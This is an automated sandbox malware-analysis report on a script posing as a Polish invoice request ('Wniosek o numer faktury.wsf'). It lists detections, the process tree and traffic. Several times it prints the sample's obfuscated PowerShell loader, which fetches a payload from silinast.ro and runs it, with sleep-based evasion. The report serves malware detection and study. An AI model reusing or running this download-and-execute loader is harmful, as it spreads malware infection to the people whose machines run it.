Windows Analysis Report
Wniosek o numer faktury.wsf

Overview

General Information

Sample name: Wniosek o numer faktury.wsf
Analysis ID: 1528870
MD5: b3a1adc2eab232bddfe5149b896af1c8
SHA1: be84a3bb6abe9b87cd90af27ca5574dae9607d48
SHA256: 55d2f245a0b7975884b7e5bbf284bcb72cc1514a726eb6988a1ca1e1e429cfb4
Tags: wsf, user-Maciej8910871
Infos:

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • wscript.exe (PID: 5500 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 6468 cmdline: cmd.exe /c ping 6777.6777.6777.677e MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 3180 cmdline: ping 6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
    • powershell.exe (PID: 1336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell script]" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source: Process Memory Space: powershell.exe PID: 1336
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security

Source: amsi64_1336.amsi.csv
Rule: JoeSecurity_PowershellDownloadAndExecute
Description: Yara detected Powershell download and execute
Author: Joe Security

      System Summary

      Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf", ProcessId: 5500, ProcessName: wscript.exe
      Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[long obfuscated PowerShell script, truncated in the report]"
      No Suricata rule has matched

      AV Detection

      Source: silinast.ro, Virustotal: Detection: 10%
      Source: http://silinast.ro, Virustotal: Detection: 10%
      Source: Wniosek o numer faktury.wsf, ReversingLabs: Detection: 23%
      Source: Wniosek o numer faktury.wsf, Virustotal: Detection: 19%
      Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.0% probability
      Source: Binary string: ystem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb95f source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.4646772637.0000015DEFAAB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb!1 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp

      Software Vulnerabilities

      Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

      Networking

      Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
      Source: global traffic, HTTP traffic detected: GET /Juglandin.xtp HTTP/1.1, Host: silinast.ro, Connection: Keep-Alive
      Source: global traffic, HTTP traffic detected: GET /Juglandin.xtp HTTP/1.1, User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Host: silinast.ro, Connection: Keep-Alive
      Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic DNS traffic detected: DNS query: 6777.6777.6777.677e
      Source: global traffic DNS traffic detected: DNS query: silinast.ro
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D81CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.ro
      Source: powershell.exe memory dumps String found in binary or memory: http://silinast.ro(
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://silinast.ro/Juglandin.xtpP
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80001000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 00000005.00000002.4613344132.0000015D80229000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000005.00000002.4640956886.0000015D901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.4640956886.0000015D90071000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe

      System Summary

      Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
      Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677e
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor 
';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'Contral
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD346F4C28 5_2_00007FFD346F4C28
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD347C5DFE 5_2_00007FFD347C5DFE
      Source: Wniosek o numer faktury.wsf Initial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 9147
      Source: classification engine Classification label: mal96.troj.expl.evad.winWSF@9/3@2/1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Kassestrimmelens.Aft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2360:120:WilError_03
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3604:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_did32yk0.pdw.ps1
      Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
      Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: Wniosek o numer faktury.wsf ReversingLabs: Detection: 23%
      Source: Wniosek o numer faktury.wsf Virustotal: Detection: 19%
      Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Wniosek o numer faktury.wsf"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido :.wfulle/.rocaic/PuppetlsJacalsii F,rulylHepht eiMaaleren epersoau,creatsLicentitConnuan.KontrrernontyphoPondero/ UnguicJ,ongfeluDyrtidsgAfgrelslThro,doa niformn charondPrefectiTv,ngsinEksdik..Kin.redxType odtkristanpInd ull ';$Terroristens=Citationstegnet 'eft rml>Deseca ';$Kaste=Citationstegnet 'U derviicephaloeLaiciziX Perfor 
';$Halibuts='Layland';$Darlenes='\Kassestrimmelens.Aft';Humiria (Citationstegnet 'Heft,gt$SkridtbGCrotonil KrystaOAbstracBpurdasiAUdsor el N,nges:Udsag kA .anthodRefas,emUncharii SuppleNPostsaci ewspapsGenvlgetD,ekcyaRNonunciA Hulds T IlliciiKvittero MorfinNEpilogisPreentepDrun,enrCus ekdOTvetandGtrkgardrLitera ABeijingM ic.orsmAlarmereSthammerInd fry=Undersk$Sur,useeSeweragNMllerenVTa kats:UndightACentralpdristerPF cellid StorstAEgomanit Sku spAMe,meri+ Pander$LinguovDKlvandkaBelliferGinglymLCumsha,EAlmennyN VarmlueBrugsmsSAnorect ');Humiria (Citationstegnet 'Viziera$AdemonigPr teifLArbejdeoVan fribMixologaAfkodnilUnderme:RegnefuUaksiomaPIncongeS Fo beheScorevatHypos rTEncr,ptaKonversl Opmarc=Economb$TrimolemOpstaada VegetaaUvrdigtlEnsurege Vo dgiS EngberT redsaAImp,ritT ArvelsiPekingeO Inthron andsynEDemoniaRAffaldsNSympatiEOverlegsFastlaa.H.vregrSSandslopBestriplMisogynimycelietoverjoy(Hagge,e$ Af,tantUnarcheeSilikatrB sgader,hasiluoFremholRDgn.rveIMiscoloS.pildolTPo letreIsocampN SubsidsBlodser)Strepto ');Humiria (Citationstegnet 'ContralJump to behavior
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping 6777.6777.6777.677e
      Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
      Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
      Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: Binary string: ystem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA73000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: bpdbtem.pdb source: powershell.exe, 00000005.00000002.4643691298.0000015DED898000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb95f source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: em.Core.pdb source: powershell.exe, 00000005.00000002.4646772637.0000015DEFAAB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb!1 source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

      Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: .Run("powershell "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspira", "0")
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD34961CE4 push esp; retf 5_2_00007FFD34961D09
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD349636A5 push ebx; ret 5_2_00007FFD349636A6
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4175
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5737
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6280 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: powershell.exe, 00000005.00000002.4646772637.0000015DEFA40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllre
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match File source: amsi64_1336.amsi.csv, type: OTHER
      Source: Yara match File source: Process Memory Space: powershell.exe PID: 1336, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c ping 6777.6777.6777.677eJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Semicellulous Sasia Afblsningers fortification Ungarbejderens #>;$Jestenenes='sollegeme';<#Perspiration Widish Redobles Foresprgerens Snobbisme #>;$Bromatologiens=$Lorelei128+$host.'PrivateData';If ($Bromatologiens) {$Boutonnieres++;}function Citationstegnet($Praepuce){$Firewarden117=$udnyttedes+$Praepuce.Length-$Boutonnieres; for( $Udfladningerne1=7;$Udfladningerne1 -lt $Firewarden117;$Udfladningerne1+=8){$Beritt='Affaldsbortskaffelsesomraaderne';$fumitories+=$Praepuce[$Udfladningerne1];$Exsectile='Impieties';}$fumitories;}function Humiria($Skdefrakkernes){ . ($Kaste) ($Skdefrakkernes);}$Udfladningerne1vyberry=Citationstegnet 'ChienfoMWingle o FrkapszSkyttesiNonshatl Vab erlNonch maKrydr s/ Cons q5 Coni i. Ophiur0Udebliv modpart(MilepleWSti lehiTak artnReirrigdUfrihedojubilizw angforsAtletis NedslagNBedrageT Defade Kuponen1Teredos0,budent.Cybercu0Matinmx;Maskinm GrskkatW UdspiniBoiler nLongw y6Mayos,v4 Anthro;S eavep Tras.expar tid6Tabanu 4Frifind;Hushold lseligrRke ispvabashle: N napp1 Pererr2 efleks1 Neutra.Recons 0H lvled) Compos esuetuG Bortf eO.gngelcSoricidkVolcanooZonesys/Glosser2Forvold0Turloug1Melleml0 nie,zs0G,lvano1F lthro0 Ristni1Landbru Lommer,FSkalkesi Sel,plrTorskeneHydrofofKonditoosiderocx kledis/Hjemt,g1 Ca,lal2 Tikkes1Nor ann.Ind atn0Ordrere ';$Aprilsnars190=Citationstegnet 'PropounUDyb rysS KongebE lozengrin issu-A,kelleaKoncis gBusfor eViewyyaN HercogTLrerudd ';$Maalestationernes=Citationstegnet 'RbdigsthPhilomatArseniutKaolinapVrdido 